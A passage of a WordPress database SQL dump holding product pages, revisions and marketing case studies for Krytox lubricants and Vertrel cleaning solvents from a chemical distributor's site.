span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-31 14:49:07', '2016-08-31 14:49:07', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1111, 2, '2016-08-31 15:00:24', '2016-08-31 15:00:24', 'Krytox GPL 407 grease is made using a nonmelting thickener instead of the normal Krytox PTFE. This change from PTFE to silica boosts the temperature capability of the grease from approximately 316°C (600°F) to an upper limit determined by the evaporation/breakdown temperature of the oil. Krytox GPL 407 is made from GPL-107 oil, which, with proper ventilation, can withstand up to 399°C (750°F) and higher temperatures for brief periods.\r\n\r\nWith replenishment/relubrication, it can last longer. While GPL-407 is not meant to replace the GPL-200 series at temperatures below 288–316°C (550–600°F), it does extend the range for using fluorinated greases to beyond the 316°C (600°F) limit of PTFE and Teflon thickened greases.', 'GPL 407', 'Krytox GPL-407 grease is made using a nonmelting thickener instead of the normal Krytox PTFE. This change from PTFE to silica boosts the temperature capability of the grease from approximately 316 °C (600 °F) to an upper limit determined by the evaporation/breakdown temperature of the oil.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-407', '', '', '2016-10-04 15:18:52', '2016-10-04 15:18:52', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1111', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1112, 2, '2016-08-31 14:57:15', '2016-08-31 14:57:15', '', 'Krytox GPL 407', '', 'inherit', 'open', 'closed', '', 'krytox-gpl-grease-high-temp', '', '', '2016-10-04 15:18:47', '2016-10-04 15:18:47', '', 1111, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-gpl-grease-high-temp.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1113, 2, '2016-08-31 15:10:38', '2016-08-31 15:10:38', '<strong>Krytox TM7 Tire Mold Industry Lubricant</strong>\r\n\r\n<strong>An American tire manufacturer increases production and saves on costly mold repair by switching lubricants.</strong>\r\n\r\nU.S. tire manufacturer improves bottom line with new lubricant A major tire manufacturer located in the United States was experiencing significant, recurring problems with galling—roughening, wearing, or warping of metal at key moveable joints—on its segmented tire molds. This resulted in frequent production downtime and required costly repairs (averaging $5,000 per mold).\r\n\r\n<strong>The Challenge </strong>\r\n\r\nThe manufacturer needed to reduce or eliminate galling on mold surfaces. Extending re-lubrication intervals was also a high priority. Because tire plants use electrically and steam heated segmented molds, the lubricant chosen had to be unaffected by steam and able to withstand high temperatures. In addition, it was important that the lubricant would not carbonize.\r\n\r\n<strong>The Solution </strong>\r\n\r\nThe facility switched from a competitor’s product to Krytox TM-7 lubricant from Chemours and began to see immediate benefits. The problems previously experienced with galling have been eliminated; so, tire presses are no longer forced to sit idle while waiting for costly repairs to the molds. What’s more, Krytox TM-7 can effectively lubricate segmented tire molds for up to 120 days, extending the re-lubrication interval by up to three times the old cycle.\r\n\r\n&nbsp;\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox TM-7 lubricant, the facility was able to eliminate the problem of galling, not only saving mold repair costs but increasing production by keeping tire presses up and running.</li>\r\n 	<li>Lubrication cycle was extended from approximately 45 days to as long as 120 days, reducing costs and minimizing downtime for maintenance.</li>\r\n 	<li>Krytox TM-7 can be used in similar applications where heated metal slides across other metals, such as compression molding machines.</li>\r\n</ul>\r\n[product id="1077"]', 'Krytox TM7 For Tire Mold Industry', '', 'publish', 'closed', 'closed', '', 'krytox-tm7-tire-mold-industry', '', '', '2016-10-07 13:52:08', '2016-10-07 13:52:08', '', 0, 'https://132.148.10.86/wordpress/?p=1113', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (1114, 2, '2016-08-31 15:10:38', '2016-08-31 15:10:38', '<strong>An American tire manufacturer increases production and saves on costly mold repair by switching lubricants.</strong>\r\n\r\nU.S. tire manufacturer improves bottom line with new lubricant A major tire manufacturer located in the United States was experiencing significant, recurring problems with galling—roughening, wearing, or warping of metal at key moveable joints—on its segmented tire molds. This resulted in frequent production downtime and required costly repairs (averaging $5,000 per mold).\r\n\r\n<strong>The Challenge </strong>\r\n\r\nThe manufacturer needed to reduce or eliminate galling on mold surfaces. Extending re-lubrication intervals was also a high priority. Because tire plants use electrically and steam heated segmented molds, the lubricant chosen had to be unaffected by steam and able to withstand high temperatures. In addition, it was important that the lubricant would not carbonize.\r\n\r\n<strong>The Solution </strong>\r\n\r\nThe facility switched from a competitor’s product to Krytox TM-7 lubricant from Chemours and began to see immediate benefits. The problems previously experienced with galling have been eliminated; so, tire presses are no longer forced to sit idle while waiting for costly repairs to the molds. What’s more, Krytox TM-7 can effectively lubricate segmented tire molds for up to 120 days, extending the re-lubrication interval by up to three times the old cycle.\r\n\r\n&nbsp;\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox TM-7 lubricant, the facility was able to eliminate the problem of galling, not only saving mold repair costs but increasing production by keeping tire presses up and running.</li>\r\n 	<li>Lubrication cycle was extended from approximately 45 days to as long as 120 days, reducing costs and minimizing downtime for maintenance.</li>\r\n 	<li>Krytox TM-7 can be used in similar applications where heated metal slides across other metals, such as compression molding machines.</li>\r\n</ul>', 'Krytox TM7 For Tire Mold Industry', '', 'inherit', 'closed', 'closed', '', '1113-revision-v1', '', '', '2016-08-31 15:10:38', '2016-08-31 15:10:38', '', 1113, 'https://132.148.10.86/wordpress/1113-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1115, 2, '2016-08-31 15:23:14', '2016-08-31 15:23:14', '“We have been using Krytox XHT-BDX for seven years now. We did a case study, and found out that we gained an additional 40% life between preventative maintenance (PM’s).” - A satisfied Krytox customer\r\n\r\n&nbsp;\r\n\r\n<strong>The Problem</strong>\r\n\r\nThe Injection Molding industry for Tier 1 auto suppliers require hundreds of man hours in preventative maintenance labor. Not using Krytox results in:\r\n<ul>\r\n 	<li>High labor costs</li>\r\n 	<li>Contaminated parts</li>\r\n 	<li>More frequent preventative maintenance</li>\r\n</ul>\r\n<strong>The Solution</strong>\r\n\r\nKrytox lubrication has been designed and demonstrated to provide the best available equipment performance and lowest available life cycle cost. Krytox XHT-BDX delivers:\r\n<ul>\r\n 	<li>Maintenance and capital savings</li>\r\n 	<li>Increased life cycle between maintainence</li>\r\n 	<li>Does not migrate to the surface or wick out</li>\r\n 	<li>Extreme heat tolerance / Doesn’t thin</li>\r\n</ul>\r\n<strong>The Application</strong>\r\n<ul>\r\n 	<li>Lifters</li>\r\n 	<li>Slides</li>\r\n 	<li>Ejector Pins</li>\r\n 	<li>Retractors</li>\r\n</ul>\r\n<strong>Demonstrated Solutions</strong>\r\n\r\nFor over 20 Years Krytox has provided state-of-the-art performance for mechanical systems under harsh conditions. From gearboxes, bearings and chains to seals, actuators, valves and more Krytox serves the specialized needs of:\r\n<ul>\r\n 	<li>Pulp and paper mills</li>\r\n 	<li>Automotive Components</li>\r\n 	<li>Military and commercial aircraft</li>\r\n 	<li>Chemical plants</li>\r\n 	<li>Power plants</li>\r\n 	<li>Turbine generators</li>\r\n 	<li>Other critical industrial applications</li>\r\n</ul>\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox for Injection Molding', '', 'publish', 'closed', 'closed', '', 'krytox-for-injection-molding', '', '', '2016-10-12 20:06:27', '2016-10-12 20:06:27', '', 0, 'https://132.148.10.86/wordpress/?p=1115', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (1116, 2, '2016-08-31 15:23:14', '2016-08-31 15:23:14', '“We have been using Krytox XHT-BDX for seven years now. We did a case study, and found out that we gained an additional 40% life between preventative maintenance (PM’s).” - A satisfied Krytox customer\r\n\r\n&nbsp;\r\n\r\n<strong>The Problem</strong>\r\n\r\nThe Injection Molding industry for Tier 1 auto suppliers require hundreds of man hours in preventative maintenance labor. Not using Krytox results in:\r\n<ul>\r\n 	<li>High labor costs</li>\r\n 	<li>Contaminated parts</li>\r\n 	<li>More frequent preventative maintenance</li>\r\n</ul>\r\n<strong>The Solution</strong>\r\n\r\nKrytox lubrication has been designed and demonstrated to provide the best available equipment performance and lowest available life cycle cost. Krytox XHT-BDX delivers:\r\n<ul>\r\n 	<li>Maintenance and capital savings</li>\r\n 	<li>Increased life cycle between maintainence</li>\r\n 	<li>Does not migrate to the surface or wick out</li>\r\n 	<li>Extreme heat tolerance / Doesn’t thin</li>\r\n</ul>\r\n<strong>The Application</strong>\r\n<ul>\r\n 	<li>Lifters</li>\r\n 	<li>Slides</li>\r\n 	<li>Ejector Pins</li>\r\n 	<li>Retractors</li>\r\n</ul>\r\n<strong>Demonstrated Solutions</strong>\r\n\r\nFor over 20 Years Krytox has provided state-of-the-art performance for mechanical systems under harsh conditions. From gearboxes, bearings and chains to seals, actuators, valves and more Krytox serves the specialized needs of:\r\n<ul>\r\n 	<li>Pulp and paper mills</li>\r\n 	<li>Automotive Components</li>\r\n 	<li>Military and commercial aircraft</li>\r\n 	<li>Chemical plants</li>\r\n 	<li>Power plants</li>\r\n 	<li>Turbine generators</li>\r\n 	<li>Other critical industrial applications</li>\r\n</ul>', 'Krytox for Injection Molding', '', 'inherit', 'closed', 'closed', '', '1115-revision-v1', '', '', '2016-08-31 15:23:14', '2016-08-31 15:23:14', '', 1115, 'https://132.148.10.86/wordpress/1115-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1117, 2, '2016-08-31 15:44:58', '2016-08-31 15:44:58', '<h1><strong>Krytox™ Lube For Life</strong></h1>\r\n<strong>A North American company improves equipment reliability by switching lubricants and joining the Lube for Life program.</strong>\r\n\r\nA major pulp and paper mill located in Western Canada wanted to improve the average operating life of its 3000 electric motors operating in a harsh environment without incurring additional costs for equipment or manpower.\r\n<h4><strong>The Challenge</strong></h4>\r\nFor this application, the pulp and paper mill needed a ball bearing lubricant that could last the expected lifetime of their motors without the implementation of a cost prohibitive re-lubrication process. The mill\'s reliability superintendent knew he could not afford to implement a system that relied upon ongoing re-greasing because of the additional equipment needed, unavoidable downtime and labor costs. However, he also realized that a more sophisticated greasing program was necessary to meet the increasing recommendations of industry experts and to avoid rebuilding and/or replacing failed motors.\r\n<h4><strong>The Solutions</strong></h4>\r\nAfter researching available options, the reliability superintendent turned to Krytox™ for help. Working with the Krytox™ technical service team, the mill implemented the use of Krytox™ grease AUT 2E45 on 100 motors as a pilot and the mill is now able to run its electric motors for their expected lifetime with no bearing failures attributed to lubrication. Switching to Krytox™ lubricants also avoided having to implement a re-lubrication process all together, saving significant manpower and downtime. The end result was a cost-effective, simplified process that not only met, but exceeded their expectations.\r\n<h4><strong>Key Advantages</strong></h4>\r\n<ul>\r\n 	<li>Using Krytox™ lubricant AUT 2E45, the pulp and paper mill was able to extend the service life of its electric motors and help ensure long-term reliability of the motor\'s ball bearings.</li>\r\n 	<li>Krytox™ lubricant AUT 2E45 enabled the mill to avoid implementing a cost re-lubrication process.</li>\r\n 	<li>Krytox™ lubricants can be used in other electric motor applications to prevent oxidation and ensure no lubricant gum-up or breakdown for the lifetime of the motor. Excellent film-forming viscosity also enables the electric motors to spin with less resistant friction, leading to less maintenance and fewer bearing replacements.</li>\r\n</ul>\r\nKrytox™ greases offer the potential for lube for life lubrication in demanding electrical motor service. Krytox™ greases are non-oxidizing, water resistant, non-flammable and chemically inert.\r\n\r\nKrytox™ greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener. The PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox™ greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox™ greases provide a thicker oil layer and reduce wear. Krytox™ greases are compatible with metals and most seal materials, but require removal of all old lubrications from the motor bearings before application.\r\n\r\n[ux_product_categories ids="37" number="10"]\r\n\r\nTo learn more about Krytox™ Lube for Life greases please click <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">this link.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox Lube For Life', '', 'publish', 'closed', 'closed', '', 'krytox-lube-for-life', '', '', '2016-10-12 20:10:24', '2016-10-12 20:10:24', '', 0, 'https://132.148.10.86/wordpress/?p=1117', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (1118, 2, '2016-08-31 15:42:07', '2016-08-31 15:42:07', '', 'lube for life', '', 'inherit', 'open', 'closed', '', 'krytox-grease-electric-motor', '', '', '2016-10-06 01:54:53', '2016-10-06 01:54:53', '', 1117, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox-grease-electric-motor.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1119, 2, '2016-08-31 15:44:58', '2016-08-31 15:44:58', 'A North American company improves equipment reliability by switching lubricants.\r\n\r\nA major pulp and paper mill located in Western Canada wanted to improve the average operating life of its 3000 electric motors operating in a harsh environment without incurring additional costs for equipment or manpower.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nFor this application, the pulp and paper mill needed a ball bearing lubricant that could last the expected lifetime of their motors without the implementation of a cost prohibitive re-lubrication process. The mill\'s reliability superintendent knew he could not afford to implement a system that relied upon ongoing re-greasing because of the additional equipment needed, unavoidable downtime and labor costs. However, he also realized that a more sophisticated greasing program was necessary to meet the increasing recommendations of industry experts and to avoid rebuilding and/or replacing failed motors.\r\n\r\n<strong>The Solutions</strong>\r\n\r\nAfter researching available options, the reliability superintendent turned to Krytox for help. Working with the Krytox technical service team, the mill implemented the use of Krytox grease AUT 2E45 on 100 motors as a pilot and the mill is now able to run its electric motors for their expected lifetime with no bearing failures attributed to lubrication. Switching to Krytox lubricants also avoided having to implement a re-lubrication process all together, saving significant manpower and downtime. The end result was a cost-effective, simplified process that not only met, but exceeded their expectations.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox lubricant AUT 2E45, the pulp and paper mill was able to extend the service life of its electric motors and help ensure long-term reliability of the motor\'s ball bearings.</li>\r\n 	<li>Krytox lubricant AUT 2E45 enabled the mill to avoid implementing a cost re-lubrication process.</li>\r\n 	<li>Krytox lubricants can be used in other electric motor applications to prevent oxidation and ensure no lubricant gum-up or breakdown for the lifetime of the motor. Excellent film-forming viscosity also enables the electric motors to spin with less resistant friction, leading to less maintenance and fewer bearing replacements.</li>\r\n</ul>\r\nKrytox greases offer the potential for fill-for-life lubrication in demanding electrical motor service. Krytox greases are non-oxidizing, water resistant, non-flammable and chemically inert.\r\n\r\nKrytox greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener. The PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox greases provide a thicker oil layer and reduce wear. Krytox greases are compatible with metals and most seal materials, but require removal of all old lubrications from the motor bearings before application.', 'Krytox Lube for Life', '', 'inherit', 'closed', 'closed', '', '1117-revision-v1', '', '', '2016-08-31 15:44:58', '2016-08-31 15:44:58', '', 1117, 'https://132.148.10.86/wordpress/1117-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1120, 2, '2016-08-31 15:45:15', '2016-08-31 15:45:15', 'A North American company improves equipment reliability by switching lubricants.\r\n\r\nA major pulp and paper mill located in Western Canada wanted to improve the average operating life of its 3000 electric motors operating in a harsh environment without incurring additional costs for equipment or manpower.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nFor this application, the pulp and paper mill needed a ball bearing lubricant that could last the expected lifetime of their motors without the implementation of a cost prohibitive re-lubrication process. The mill\'s reliability superintendent knew he could not afford to implement a system that relied upon ongoing re-greasing because of the additional equipment needed, unavoidable downtime and labor costs. However, he also realized that a more sophisticated greasing program was necessary to meet the increasing recommendations of industry experts and to avoid rebuilding and/or replacing failed motors.\r\n\r\n<strong>The Solutions</strong>\r\n\r\nAfter researching available options, the reliability superintendent turned to Krytox for help. Working with the Krytox technical service team, the mill implemented the use of Krytox grease AUT 2E45 on 100 motors as a pilot and the mill is now able to run its electric motors for their expected lifetime with no bearing failures attributed to lubrication. Switching to Krytox lubricants also avoided having to implement a re-lubrication process all together, saving significant manpower and downtime. The end result was a cost-effective, simplified process that not only met, but exceeded their expectations.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox lubricant AUT 2E45, the pulp and paper mill was able to extend the service life of its electric motors and help ensure long-term reliability of the motor\'s ball bearings.</li>\r\n 	<li>Krytox lubricant AUT 2E45 enabled the mill to avoid implementing a cost re-lubrication process.</li>\r\n 	<li>Krytox lubricants can be used in other electric motor applications to prevent oxidation and ensure no lubricant gum-up or breakdown for the lifetime of the motor. Excellent film-forming viscosity also enables the electric motors to spin with less resistant friction, leading to less maintenance and fewer bearing replacements.</li>\r\n</ul>\r\nKrytox greases offer the potential for fill-for-life lubrication in demanding electrical motor service. Krytox greases are non-oxidizing, water resistant, non-flammable and chemically inert.\r\n\r\nKrytox greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener. The PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox greases provide a thicker oil layer and reduce wear. Krytox greases are compatible with metals and most seal materials, but require removal of all old lubrications from the motor bearings before application.', 'Krytox Lube For Life', '', 'inherit', 'closed', 'closed', '', '1117-revision-v1', '', '', '2016-08-31 15:45:15', '2016-08-31 15:45:15', '', 1117, 'https://132.148.10.86/wordpress/1117-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1121, 2, '2016-08-31 15:55:30', '2016-08-31 15:55:30', 'Why are Vertrel fluids a suitable replacement for nPB?\r\n\r\nRecently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf\r\n\r\nThe report concluded that there was “clear evidence of carcinogenic activity” in female mice and rats. As a result of this finding, Cal/OSHA has set an 8-hour worker permissible exposure limit (PEL) of 5 ppm. In addition, the American Conference of Governmental Industrial Hygienist (ACGIH) in 2011 has proposed a TLV of 0.1 ppm. Vertrel specialty fluids can replace nPB, providing the cleaning efficacy needed while addressing safety and health concerns. Here are five reasons it is an excellent replacement for nPB:\r\n<ol>\r\n 	<li><strong>Exposure Limit:</strong> Vertrel fluids have exposure limits around 200 ppm. By comparison, Isopropyl alcohol (rubbing alcohol) has an exposure limit of 200 ppm. The exposure limit of nPB exposure limit is measured between 5 ppm – 10 ppm by varying standards organizations.</li>\r\n 	<li> <strong>Cleaning Performance:</strong> Vertrel specialty fluids have the broadest range of cleaning power of any solvent family. KB values (a measure of cleaning power) range from 11 to a high of 110. Vertrel can match nPB’s cleaning power.</li>\r\n 	<li><strong>Solvent Maintenance:</strong> Vertrel fluids are inherently stable and do not need acid acceptance testing or stabilizer maintenance unlike nPB. In addition, the relatively high exposure limit of Vertrel enables the use of open top vapor degreasers, and solvent air monitoring can be kept to a minimum.</li>\r\n 	<li><strong>Solvent Usage:</strong> Today’s cleaning equipment manufacturers have improved system design resulting in significant reductions in the amount of solvent emissions and reducing overall operating costs. Vertrel is cost competitive with nPB as a result of the emissions reduction.</li>\r\n 	<li><strong>Global Acceptance:</strong> These specialty fluids are globally accepted as a safe cleaning material. Many countries have classified nPB as a reproductive toxin. In Europe, nPB is labeled as R60 (may impair fertility); R63 (possible risk of harm to the unborn child); and R48/20 (harmful: danger of serious damage to health by prolonged exposure through inhalation).</li>\r\n</ol>\r\n<strong>Summary</strong>\r\n\r\nVertrel <a href="https://www.miller-stephenson.com/chemicals/solvents/vertrel/">specialty fluids</a> have similar solvency strength as nPB. It is non-flammable, safe, and requires no stabilizers, making it an ideal replacement for nPB. <a href="https://www.miller-stephenson.com/chemicals/solvents/opteon-solvents/">Opteon™ products</a> are also a great replacement for nPb.\r\n\r\n<img class="alignnone size-full wp-image-2002" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser-1.jpg" alt="vapor-degreaser" width="680" height="498" />\r\n\r\n[ux_product_categories ids="232,231" number="10"]', 'Why Vertrel specialty fluids are a suitable replacement for N-propyl bromide and Trichloroethylene', '', 'publish', 'closed', 'closed', '', 'vertrel-fluids', '', '', '2016-10-14 19:11:56', '2016-10-14 19:11:56', '', 0, 'https://132.148.10.86/wordpress/?p=1121', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (1122, 2, '2016-08-31 15:55:30', '2016-08-31 15:55:30', 'Recently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf The report concluded that there was “clear evidence of carcinogenic activity” in female mice and rats. As a result of this finding, Cal/OSHA has set an 8-hour worker permissible exposure limit (PEL) of 5 ppm. In addition, the American Conference of Governmental Industrial Hygienist (ACGIH) in 2011 has proposed a TLV of 0.1 ppm. Vertrel specialty fluids can replace nPB, providing the cleaning efficacy needed while addressing safety and health concerns. Here are five reasons Vertrel is an excellent replacement for nPB:\r\n<ol>\r\n 	<li><strong>Exposure Limit:</strong> Vertrel specialty fluids have exposure limits around 200 ppm. By comparison, Isopropyl alcohol (rubbing alcohol) has an exposure limit of 200 ppm. The exposure limit of nPB exposure limit is measured between 5 ppm – 10 ppm by varying standards organizations.</li>\r\n 	<li> <strong>Cleaning Performance:</strong> Vertrel specialty fluids have the broadest range of cleaning power of any solvent family. KB values (a measure of cleaning power) range from 11 to a high of 110. Vertrel can match nPB’s cleaning power.</li>\r\n 	<li><strong>Solvent Maintenance:</strong> Vertrel specialty fluids are inherently stable and do not need acid acceptance testing or stabilizer maintenance unlike nPB. In addition, the relatively high exposure limit of Vertrel enables the use of open top vapor degreasers, and solvent air monitoring can be kept to a minimum.</li>\r\n 	<li><strong>Solvent Usage:</strong> Today’s cleaning equipment manufacturers have improved system design resulting in significant reductions in the amount of solvent emissions and reducing overall operating costs. Vertrel is cost competitive with nPB as a result of the emissions reduction.</li>\r\n 	<li><strong>Global Acceptance:</strong> Vertrel specialty fluids are globally accepted as a safe cleaning material. Many countries have classified nPB as a reproductive toxin. In Europe, nPB is labeled as R60 (may impair fertility); R63 (possible risk of harm to the unborn child); and R48/20 (harmful: danger of serious damage to health by prolonged exposure through inhalation).</li>\r\n</ol>\r\n<strong>Summary</strong>\r\n\r\nVertrel specialty fluids have similar solvency strength as nPB. Vertrel is non-flammable, safe, and requires no stabilizers, making Vertrel an ideal replacement for nPB.', 'Why Vertrel specialty fluids are a suitable replacement for nPB', '', 'inherit', 'closed', 'closed', '', '1121-revision-v1', '', '', '2016-08-31 15:55:30', '2016-08-31 15:55:30', '', 1121, 'https://132.148.10.86/wordpress/1121-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1123, 2, '2016-08-31 15:56:48', '2016-08-31 15:56:48', 'Recently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf\r\n\r\nThe report concluded that there was “clear evidence of carcinogenic activity” in female mice and rats. As a result of this finding, Cal/OSHA has set an 8-hour worker permissible exposure limit (PEL) of 5 ppm. In addition, the American Conference of Governmental Industrial Hygienist (ACGIH) in 2011 has proposed a TLV of 0.1 ppm. Vertrel specialty fluids can replace nPB, providing the cleaning efficacy needed while addressing safety and health concerns. Here are five reasons Vertrel is an excellent replacement for nPB:\r\n<ol>\r\n 	<li><strong>Exposure Limit:</strong> Vertrel specialty fluids have exposure limits around 200 ppm. By comparison, Isopropyl alcohol (rubbing alcohol) has an exposure limit of 200 ppm. The exposure limit of nPB exposure limit is measured between 5 ppm – 10 ppm by varying standards organizations.</li>\r\n 	<li> <strong>Cleaning Performance:</strong> Vertrel specialty fluids have the broadest range of cleaning power of any solvent family. KB values (a measure of cleaning power) range from 11 to a high of 110. Vertrel can match nPB’s cleaning power.</li>\r\n 	<li><strong>Solvent Maintenance:</strong> Vertrel specialty fluids are inherently stable and do not need acid acceptance testing or stabilizer maintenance unlike nPB. In addition, the relatively high exposure limit of Vertrel enables the use of open top vapor degreasers, and solvent air monitoring can be kept to a minimum.</li>\r\n 	<li><strong>Solvent Usage:</strong> Today’s cleaning equipment manufacturers have improved system design resulting in significant reductions in the amount of solvent emissions and reducing overall operating costs. Vertrel is cost competitive with nPB as a result of the emissions reduction.</li>\r\n 	<li><strong>Global Acceptance:</strong> Vertrel specialty fluids are globally accepted as a safe cleaning material. Many countries have classified nPB as a reproductive toxin. In Europe, nPB is labeled as R60 (may impair fertility); R63 (possible risk of harm to the unborn child); and R48/20 (harmful: danger of serious damage to health by prolonged exposure through inhalation).</li>\r\n</ol>\r\n<strong>Summary</strong>\r\n\r\nVertrel specialty fluids have similar solvency strength as nPB. Vertrel is non-flammable, safe, and requires no stabilizers, making Vertrel an ideal replacement for nPB.', 'Why Vertrel specialty fluids are a suitable replacement for nPB', '', 'inherit', 'closed', 'closed', '', '1121-revision-v1', '', '', '2016-08-31 15:56:48', '2016-08-31 15:56:48', '', 1121, 'https://132.148.10.86/wordpress/1121-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1125, 2, '2016-08-31 16:38:12', '2016-08-31 16:38:12', '', 'nPB Replacements', '', 'inherit', 'open', 'closed', '', 'shutterstock_377391160', '', '', '2016-10-06 12:48:35', '2016-10-06 12:48:35', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_377391160.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1127, 2, '2016-08-31 16:42:07', '2016-08-31 16:42:07', '<strong>A North American company improves equipment reliability by switching lubricants.</strong>\r\n\r\nA major pulp and paper mill located in Western Canada wanted to improve the average operating life of its 3000 electric motors operating in a harsh environment without incurring additional costs for equipment or manpower.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nFor this application, the pulp and paper mill needed a ball bearing lubricant that could last the expected lifetime of their motors without the implementation of a cost prohibitive re-lubrication process. The mill\'s reliability superintendent knew he could not afford to implement a system that relied upon ongoing re-greasing because of the additional equipment needed, unavoidable downtime and labor costs. However, he also realized that a more sophisticated greasing program was necessary to meet the increasing recommendations of industry experts and to avoid rebuilding and/or replacing failed motors.\r\n\r\n<strong>The Solutions</strong>\r\n\r\nAfter researching available options, the reliability superintendent turned to Krytox for help. Working with the Krytox technical service team, the mill implemented the use of Krytox grease AUT 2E45 on 100 motors as a pilot and the mill is now able to run its electric motors for their expected lifetime with no bearing failures attributed to lubrication. Switching to Krytox lubricants also avoided having to implement a re-lubrication process all together, saving significant manpower and downtime. The end result was a cost-effective, simplified process that not only met, but exceeded their expectations.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox lubricant AUT 2E45, the pulp and paper mill was able to extend the service life of its electric motors and help ensure long-term reliability of the motor\'s ball bearings.</li>\r\n 	<li>Krytox lubricant AUT 2E45 enabled the mill to avoid implementing a cost re-lubrication process.</li>\r\n 	<li>Krytox lubricants can be used in other electric motor applications to prevent oxidation and ensure no lubricant gum-up or breakdown for the lifetime of the motor. Excellent film-forming viscosity also enables the electric motors to spin with less resistant friction, leading to less maintenance and fewer bearing replacements.</li>\r\n</ul>\r\nKrytox greases offer the potential for fill-for-life lubrication in demanding electrical motor service. Krytox greases are non-oxidizing, water resistant, non-flammable and chemically inert.\r\n\r\nKrytox greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener. The PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox greases provide a thicker oil layer and reduce wear. Krytox greases are compatible with metals and most seal materials, but require removal of all old lubrications from the motor bearings before application.', 'Krytox Lube For Life', '', 'inherit', 'closed', 'closed', '', '1117-revision-v1', '', '', '2016-08-31 16:42:07', '2016-08-31 16:42:07', '', 1117, 'https://132.148.10.86/wordpress/1117-revision-v1/', 0, 'revision', '', 0); 
